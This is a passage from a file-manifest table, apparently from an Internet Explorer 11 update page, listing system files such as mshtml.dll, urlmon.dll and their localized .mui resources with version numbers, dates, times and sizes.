12:08| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:23| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:14| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:48| 4,858,880 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 21:57| 54,784 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 2:49| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:36| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:14| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 75,776 \nieui.dll| 11.0.9600.20045| 4-Jun-2021| 22:15| 615,936 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:45| 381,952 \ninstall.ins| Not versioned| 13-Aug-2021| 17:52| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:11| 800,768 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:41| 145,920 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 21:40| 33,280 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:47| 88,064 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 21:32| 666,624 \niedvtool.dll| 11.0.9600.20045| 5-Jun-2021| 0:16| 950,784 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:21| 50,176 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:53| 491,008 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 316,416 \nEscMigPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 124,416 \nescUnattend.exe| 11.0.9600.19326| 25-Mar-2019| 22:54| 87,040 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:23| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:51| 245,248 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 19:00| 10,949,120 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:50| 372,224 \nF12.dll| 11.0.9600.20045| 4-Jun-2021| 21:50| 1,422,848 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 809,472 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:54| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 23:54| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 5:16| 60,416 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 22:08| 12,800 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 13,824 \nmshtmled.dll| 11.0.9600.20045| 4-Jun-2021| 21:55| 92,672 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 22:07| 25,759,232 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 3:30| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:41| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 21:54| 132,096 \nieetwcollector.exe| 11.0.9600.18895| 1-Jan-2018| 21:17| 116,224 \nieetwproxystub.dll| 11.0.9600.18895| 1-Jan-2018| 21:28| 48,640 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 3:30| 4,096 \nielowutil.exe| 11.0.9600.17416| 30-Oct-2014| 21:55| 222,720 \nieproxy.dll| 11.0.9600.20045| 4-Jun-2021| 21:13| 870,400 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:29| 387,072 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 22:10| 167,424 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 143,872 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:08| 51,712 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 21:51| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Aug-2021| 22:36| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 591,872 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 1,862,656 \nMshtmlDac.dll| 11.0.9600.19846| 23-Sep-2020| 21:25| 88,064 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 1,217,024 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 21:19| 152,064 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:43| 65 \nwebcheck.dll| 11.0.9600.20045| 4-Jun-2021| 21:44| 262,144 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:44| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 579,192 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 403,592 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 107,152 \nmsrating.dll| 11.0.9600.18895| 1-Jan-2018| 20:56| 199,680 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:56| 2,916,864 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:28| 728,064 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 21:56| 34,304 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 66,560 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:58| 16,303 \ninseng.dll| 11.0.9600.19101| 18-Jul-2018| 21:03| 107,520 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 21:29| 111,616 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 219,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 172,032 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 11:58| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 1,018,880 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 237,568 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 23:22| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:15| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:16| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:12| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:24| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 15,506,432 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:41| 24,486 \nieinstal.exe| 11.0.9600.18639| 25-Mar-2017| 10:20| 492,032 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:14| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:57| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:03| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \ninetres.admx| Not versioned| 8-Feb-2021| 20:02| 1,678,023 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:48| 1,033,216 \nINETRES.dll| 6.3.9600.16384| 22-Aug-2013| 4:43| 84,480 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 20:47| 5,508,096 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 19:03| 814,592 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:12| 785,408 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:22| 581,120 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 20,294,144 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nwow64_Microsoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:43| 3,228 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 13,881,856 \nie9props.propdesc| Not versioned| 23-Sep-2013| 19:34| 2,843 \nwow64_ieframe.ptxml| Not versioned| 5-Feb-2014| 21:43| 24,486 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 4,119,040 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:56| 653,824 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:04| 498,176 \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:32| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:19| 1,342,976 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:30| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 